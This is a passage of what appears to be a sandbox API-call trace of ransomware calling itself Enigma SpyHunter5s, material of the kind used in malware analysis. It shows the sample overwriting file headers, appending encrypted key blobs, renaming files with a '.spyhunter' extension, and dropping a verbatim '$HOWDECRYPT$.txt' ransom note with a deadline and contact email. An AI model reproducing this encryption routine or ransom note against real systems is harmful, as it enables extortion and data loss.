() returned 0x2c0000 [0178.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.119] GetProcessHeap () returned 0x2c0000 [0178.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0178.119] GetProcessHeap () returned 0x2c0000 [0178.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d09bc0 | out: hHeap=0x2c0000) returned 1 [0178.119] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e440 | out: pbBuffer=0x270e440) returned 1 [0178.119] GetProcessHeap () returned 0x2c0000 [0178.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0178.120] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e438*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e438*=0x30) returned 1 [0178.120] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.applications.addinadapter.v10.0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0178.120] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll") returned 159 [0178.120] StrStrW (lpFirst="Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll", lpSrch=".txt") returned 0x0 [0178.120] GetProcessHeap () returned 0x2c0000 [0178.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0178.120] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e3fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e3fc*=0x2800, lpOverlapped=0x0) returned 1 [0178.122] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.122] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e3fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e3fc*=0x2800, lpOverlapped=0x0) returned 1 [0178.122] GetProcessHeap () returned 0x2c0000 [0178.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0178.122] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.122] WriteFile (in: hFile=0xa0, lpBuffer=0x270e43c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e3fc, lpOverlapped=0x0 | out: lpBuffer=0x270e43c*, lpNumberOfBytesWritten=0x270e3fc*=0x4, lpOverlapped=0x0) returned 1 [0178.123] WriteFile (in: hFile=0xa0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e3fc, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e3fc*=0x30, lpOverlapped=0x0) returned 1 [0178.123] CloseHandle (hObject=0xa0) returned 1 [0178.124] GetProcessHeap () returned 0x2c0000 [0178.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.124] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll.spyhunter") returned 169 [0178.124] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.applications.addinadapter.v10.0.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\AddInSideAdapters\\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v10.0.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\addinsideadapters\\microsoft.visualstudio.tools.applications.addinadapter.v10.0.dll.spyhunter")) returned 1 [0178.125] GetProcessHeap () returned 0x2c0000 [0178.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.125] GetProcessHeap () returned 0x2c0000 [0178.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0178.125] GetProcessHeap () returned 0x2c0000 [0178.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x337c68 | out: hHeap=0x2c0000) returned 1 [0178.125] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\appinfodocument\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0178.136] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0178.136] WriteFile (in: hFile=0xb0, lpBuffer=0x270e36f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e498, lpOverlapped=0x0 | out: lpBuffer=0x270e36f*, lpNumberOfBytesWritten=0x270e498*=0x127, lpOverlapped=0x0) returned 1 [0178.137] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0178.137] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e498, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e498*=0x2ac, lpOverlapped=0x0) returned 1 [0178.138] CloseHandle (hObject=0xb0) returned 1 [0178.138] GetProcessHeap () returned 0x2c0000 [0178.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4e500 | out: hHeap=0x2c0000) returned 1 [0178.138] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e438 | out: pbBuffer=0x270e438) returned 1 [0178.138] GetProcessHeap () returned 0x2c0000 [0178.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0178.138] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e430*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e430*=0x30) returned 1 [0178.138] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\AddIns.store" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\appinfodocument\\addins.store"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0178.139] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\AddIns.store") returned 90 [0178.139] StrStrW (lpFirst="AddIns.store", lpSrch=".txt") returned 0x0 [0178.139] GetProcessHeap () returned 0x2c0000 [0178.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0178.139] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e3f4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e3f4*=0x25b9, lpOverlapped=0x0) returned 1 [0178.192] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffda47, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.192] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x25b9, lpNumberOfBytesWritten=0x270e3f4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e3f4*=0x25b9, lpOverlapped=0x0) returned 1 [0178.192] GetProcessHeap () returned 0x2c0000 [0178.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0178.192] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.192] WriteFile (in: hFile=0xb0, lpBuffer=0x270e434*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e3f4, lpOverlapped=0x0 | out: lpBuffer=0x270e434*, lpNumberOfBytesWritten=0x270e3f4*=0x4, lpOverlapped=0x0) returned 1 [0178.192] WriteFile (in: hFile=0xb0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e3f4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e3f4*=0x30, lpOverlapped=0x0) returned 1 [0178.192] CloseHandle (hObject=0xb0) returned 1 [0178.192] GetProcessHeap () returned 0x2c0000 [0178.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.192] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\AddIns.store.spyhunter") returned 100 [0178.192] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\AddIns.store" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\appinfodocument\\addins.store"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\AppInfoDocument\\AddIns.store.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\appinfodocument\\addins.store.spyhunter")) returned 1 [0178.193] GetProcessHeap () returned 0x2c0000 [0178.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.193] GetProcessHeap () returned 0x2c0000 [0178.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0178.194] GetProcessHeap () returned 0x2c0000 [0178.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5dac0 | out: hHeap=0x2c0000) returned 1 [0178.194] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e430 | out: pbBuffer=0x270e430) returned 1 [0178.194] GetProcessHeap () returned 0x2c0000 [0178.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0178.194] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e428*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e428*=0x30) returned 1 [0178.194] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia80.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\msdia80.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0178.195] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia80.dll") returned 71 [0178.195] StrStrW (lpFirst="msdia80.dll", lpSrch=".txt") returned 0x0 [0178.196] GetProcessHeap () returned 0x2c0000 [0178.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0178.196] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e3ec, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e3ec*=0x2800, lpOverlapped=0x0) returned 1 [0178.197] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.197] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e3ec, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e3ec*=0x2800, lpOverlapped=0x0) returned 1 [0178.197] GetProcessHeap () returned 0x2c0000 [0178.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0178.197] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.197] WriteFile (in: hFile=0xb0, lpBuffer=0x270e42c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e3ec, lpOverlapped=0x0 | out: lpBuffer=0x270e42c*, lpNumberOfBytesWritten=0x270e3ec*=0x4, lpOverlapped=0x0) returned 1 [0178.200] WriteFile (in: hFile=0xb0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e3ec, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e3ec*=0x30, lpOverlapped=0x0) returned 1 [0178.200] CloseHandle (hObject=0xb0) returned 1 [0178.200] GetProcessHeap () returned 0x2c0000 [0178.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.200] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia80.dll.spyhunter") returned 81 [0178.200] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia80.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\msdia80.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\msdia80.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\msdia80.dll.spyhunter")) returned 1 [0178.206] GetProcessHeap () returned 0x2c0000 [0178.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.206] GetProcessHeap () returned 0x2c0000 [0178.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0178.206] GetProcessHeap () returned 0x2c0000 [0178.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7c468 | out: hHeap=0x2c0000) returned 1 [0178.206] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\amd64\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0178.207] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0178.207] WriteFile (in: hFile=0xb0, lpBuffer=0x270e363*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e48c, lpOverlapped=0x0 | out: lpBuffer=0x270e363*, lpNumberOfBytesWritten=0x270e48c*=0x127, lpOverlapped=0x0) returned 1 [0178.207] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0178.207] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e48c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e48c*=0x2ac, lpOverlapped=0x0) returned 1 [0178.208] CloseHandle (hObject=0xb0) returned 1 [0178.208] GetProcessHeap () returned 0x2c0000 [0178.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9790 | out: hHeap=0x2c0000) returned 1 [0178.208] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e428 | out: pbBuffer=0x270e428) returned 1 [0178.208] GetProcessHeap () returned 0x2c0000 [0178.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0178.208] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e420*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e420*=0x30) returned 1 [0178.208] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\msdia80.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\amd64\\msdia80.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0178.209] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\msdia80.dll") returned 77 [0178.209] StrStrW (lpFirst="msdia80.dll", lpSrch=".txt") returned 0x0 [0178.209] GetProcessHeap () returned 0x2c0000 [0178.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0178.209] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e3e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e3e4*=0x2800, lpOverlapped=0x0) returned 1 [0178.238] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.239] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e3e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e3e4*=0x2800, lpOverlapped=0x0) returned 1 [0178.239] GetProcessHeap () returned 0x2c0000 [0178.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0178.239] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.239] WriteFile (in: hFile=0xb0, lpBuffer=0x270e424*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e3e4, lpOverlapped=0x0 | out: lpBuffer=0x270e424*, lpNumberOfBytesWritten=0x270e3e4*=0x4, lpOverlapped=0x0) returned 1 [0178.324] WriteFile (in: hFile=0xb0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e3e4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e3e4*=0x30, lpOverlapped=0x0) returned 1 [0178.324] CloseHandle (hObject=0xb0) returned 1 [0178.324] GetProcessHeap () returned 0x2c0000 [0178.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.324] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\msdia80.dll.spyhunter") returned 87 [0178.325] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\msdia80.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\amd64\\msdia80.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VC\\amd64\\msdia80.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vc\\amd64\\msdia80.dll.spyhunter")) returned 1 [0178.326] GetProcessHeap () returned 0x2c0000 [0178.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.326] GetProcessHeap () returned 0x2c0000 [0178.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0178.327] GetProcessHeap () returned 0x2c0000 [0178.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee9d30 | out: hHeap=0x2c0000) returned 1 [0178.327] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\portal\\1033\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0178.328] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0178.328] WriteFile (in: hFile=0xb0, lpBuffer=0x270e35b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e484, lpOverlapped=0x0 | out: lpBuffer=0x270e35b*, lpNumberOfBytesWritten=0x270e484*=0x127, lpOverlapped=0x0) returned 1 [0178.329] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0178.330] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e484, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e484*=0x2ac, lpOverlapped=0x0) returned 1 [0178.330] CloseHandle (hObject=0xb0) returned 1 [0178.330] GetProcessHeap () returned 0x2c0000 [0178.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4ba98 | out: hHeap=0x2c0000) returned 1 [0178.330] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e420 | out: pbBuffer=0x270e420) returned 1 [0178.330] GetProcessHeap () returned 0x2c0000 [0178.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0178.330] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e418*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e418*=0x30) returned 1 [0178.330] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Portal\\1033\\PortalConnect.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\portal\\1033\\portalconnect.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 